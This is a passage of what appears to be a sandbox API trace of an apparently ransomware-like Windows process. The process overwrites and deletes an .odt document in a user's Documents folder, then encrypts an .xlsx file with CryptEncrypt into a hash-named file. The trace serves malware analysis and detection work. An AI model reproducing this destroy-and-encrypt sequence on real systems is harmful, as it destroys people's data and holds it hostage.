lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", lpFilePart=0x0) returned 0x3f [0074.288] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", dwFileAttributes=0x80) returned 1 [0074.289] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", lpFilePart=0x0) returned 0x3f [0074.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0074.289] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gsxuytargthmal4dufg.odt"), fInfoLevelId=0x0, lpFileInformation=0x222b768 | out: lpFileInformation=0x222b768*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xb5232660, ftCreationTime.dwHighDateTime=0x1d4d1c1, ftLastAccessTime.dwLowDateTime=0xeb2d8840, ftLastAccessTime.dwHighDateTime=0x1d4cb7c, ftLastWriteTime.dwLowDateTime=0xeb2d8840, ftLastWriteTime.dwHighDateTime=0x1d4cb7c, nFileSizeHigh=0x0, nFileSizeLow=0x14a53)) returned 1 [0074.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0074.289] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", lpFilePart=0x0) returned 0x3f [0074.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0074.289] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gsxuytargthmal4dufg.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.289] GetFileType (hFile=0x36c) returned 0x1 [0074.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0074.289] GetFileType (hFile=0x36c) returned 0x1 [0074.289] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.290] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.291] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.291] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.292] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.293] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.294] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.294] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.295] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.296] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.296] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.297] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.298] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.299] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.299] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.300] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.301] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.302] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.436] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.437] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.437] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.438] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5daa8*=0xc00, lpOverlapped=0x0) returned 1 [0074.438] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.439] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.439] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.440] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.441] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.442] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.442] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.443] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.444] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.445] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.445] WriteFile (in: hFile=0x36c, lpBuffer=0x222bc30*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x222bc30*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0074.446] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.447] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0074.447] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0074.447] SetEndOfFile (hFile=0x36c) returned 1 [0074.449] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0074.449] CloseHandle (hObject=0x36c) returned 1 [0074.449] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", lpFilePart=0x0) returned 0x3f [0074.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0074.449] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gsxuytargthmal4dufg.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.449] GetFileType (hFile=0x36c) returned 0x1 [0074.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0074.449] GetFileType (hFile=0x36c) returned 0x1 [0074.449] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0074.449] CloseHandle (hObject=0x36c) returned 1 [0074.449] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", lpFilePart=0x0) returned 0x3f [0074.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0074.450] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gsxuytargthmal4dufg.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.450] GetFileType (hFile=0x36c) returned 0x1 [0074.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0074.450] GetFileType (hFile=0x36c) returned 0x1 [0074.450] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0074.450] CloseHandle (hObject=0x36c) returned 1 [0074.450] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", lpFilePart=0x0) returned 0x3f [0074.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0074.450] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gsxuytargthmal4dufg.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.450] GetFileType (hFile=0x36c) returned 0x1 [0074.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0074.450] GetFileType (hFile=0x36c) returned 0x1 [0074.450] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0074.450] CloseHandle (hObject=0x36c) returned 1 [0074.450] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", lpFilePart=0x0) returned 0x3f [0074.450] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gsxuytargthmal4dufg.odt")) returned 1 [0074.451] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GSXuytaRGthMal4dUFG.odt", lpFilePart=0x0) returned 0x3f [0074.451] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1", lpFilePart=0x0) returned 0x48 [0074.451] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.451] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ba089cae47a022ad42afc7573ed986a1"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.452] GetFileType (hFile=0x36c) returned 0x1 [0074.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.452] GetFileType (hFile=0x36c) returned 0x1 [0074.452] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0074.452] CloseHandle (hObject=0x36c) returned 1 [0074.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1", lpFilePart=0x0) returned 0x48 [0074.452] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.452] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ba089cae47a022ad42afc7573ed986a1"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.452] GetFileType (hFile=0x36c) returned 0x1 [0074.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.452] GetFileType (hFile=0x36c) returned 0x1 [0074.452] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0074.452] CloseHandle (hObject=0x36c) returned 1 [0074.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1", lpFilePart=0x0) returned 0x48 [0074.452] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0074.453] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BA089CAE47A022AD42AFC7573ED986A1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ba089cae47a022ad42afc7573ed986a1"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.453] GetFileType (hFile=0x36c) returned 0x1 [0074.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0074.453] GetFileType (hFile=0x36c) returned 0x1 [0074.453] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0074.453] CloseHandle (hObject=0x36c) returned 1 [0074.453] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", lpFilePart=0x0) returned 0x3e [0074.453] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", lpFilePart=0x0) returned 0x3e [0074.454] CryptImportKey (in: hProv=0x1a5b7c10, pbData=0x222f070, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a626ad0) returned 1 [0074.454] CryptContextAddRef (hProv=0x1a5b7c10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.454] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0074.454] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x222f160, pdwDataLen=0x1bf5db30 | out: pbData=0x222f160*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0074.454] CryptImportKey (in: hProv=0x1a5b7c10, pbData=0x222f280, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626fa0) returned 1 [0074.454] CryptContextAddRef (hProv=0x1a5b7c10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.454] CryptContextAddRef (hProv=0x1a5b7c10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.454] CryptDuplicateKey (in: hKey=0x1a626fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626c20) returned 1 [0074.454] CryptContextAddRef (hProv=0x1a5b7c10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0074.455] CryptSetKeyParam (hKey=0x1a626c20, dwParam=0x4, pbData=0x222f3c8*=0x1, dwFlags=0x0) returned 1 [0074.455] CryptSetKeyParam (hKey=0x1a626c20, dwParam=0x1, pbData=0x222f378, dwFlags=0x0) returned 1 [0074.455] CryptDestroyKey (hKey=0x1a626fa0) returned 1 [0074.455] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0074.455] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx", lpFilePart=0x0) returned 0x3e [0074.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0074.455] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HGjIZA52n2jSImcnl.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hgjiza52n2jsimcnl.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0074.455] GetFileType (hFile=0x36c) returned 0x1 [0074.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0074.455] GetFileType (hFile=0x36c) returned 0x1 [0074.455] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382", lpFilePart=0x0) returned 0x48 [0074.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0074.455] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4826EFF1D06FE161AF3B31D40A228382" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4826eff1d06fe161af3b31d40a228382"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x380 [0074.455] GetFileType (hFile=0x380) returned 0x1 [0074.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0074.456] GetFileType (hFile=0x380) returned 0x1 [0074.456] ReadFile (in: hFile=0x36c, lpBuffer=0x222f798, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x222f798*, lpNumberOfBytesRead=0x1bf5da28*=0x25dc, lpOverlapped=0x0) returned 1 [0074.456] CryptEncrypt (in: hKey=0x1a626c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22437b0*, pdwDataLen=0x1bf5da80*=0x25d0, dwBufLen=0x25d0 | out: pbData=0x22437b0*, pdwDataLen=0x1bf5da80*=0x25d0) returned 1 [0074.456] WriteFile (in: hFile=0x380, lpBuffer=0x22437b0*, nNumberOfBytesToWrite=0x25d0, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x22437b0*, lpNumberOfBytesWritten=0x1bf5da18*=0x25d0, lpOverlapped=0x0) returned 1 [0074.457] ReadFile (in: hFile=0x36c, lpBuffer=0x222f798, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x222f798*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0074.458] CryptEncrypt (in: hKey=0x1a626c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2245dc0*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x2245dc0*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0074.458] CryptEncrypt (in: hKey=0x1a626c20, hHash=0x0, Final=1, 